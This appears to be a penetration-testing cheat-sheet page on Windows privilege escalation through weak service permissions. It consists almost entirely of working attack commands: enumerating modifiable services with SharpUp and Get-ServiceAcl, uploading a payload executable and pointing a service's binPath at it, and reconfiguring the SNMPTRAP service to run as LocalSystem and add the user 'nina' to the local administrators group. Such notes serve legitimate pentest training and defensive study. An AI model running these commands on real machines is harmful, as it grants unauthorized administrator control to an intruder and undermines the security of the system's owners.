Weak Service Permissions

Using SharpUp

Find vulnerable service

SharpUp.exe audit ModifiableServices

VulnService2

Check service rights

Import-Module C:\Tools\Get-ServiceAcl.ps1

powershell Get-ServiceAcl -Name VulnService2 | select -expand Access

ServiceRights     : ChangeConfig, Start, Stop
AccessControlType : AccessAllowed
IdentityReference : NT AUTHORITY\Authenticated Users

Change binary path

sc qc VulnService2

mkdir C:\Temp
cd C:\Temp
upload C:\Payloads\tcp-local_x64.svc.exe

sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
sc qc VulnService2

Restore:

sc config VulnService2 binPath= ""C:\Program Files\Vulnerable Services\Service 2.exe""

Attack scenario

We have AllAccess to service SNMPTRAP

SNMPTRAP: AllAccess

Instead of pointing the binary path to a rev shell, we will add ourselves to local admin group.

sc qc SNMPTRAP
sc config SNMPTRAP binpath= "net localgroup administrators nina /add"
sc config SNMPTRAP obj= ".\LocalSystem" password= ""
sc config SNMPTRAP start= auto
sc start SNMPTRAP

Tooling

https://github.com/Sambal0x/tools/blob/master/Get-ServiceAcl.ps1

Last updated 2 years ago

hashtagAttack scenario

hashtagTooling

Attack scenario

Tooling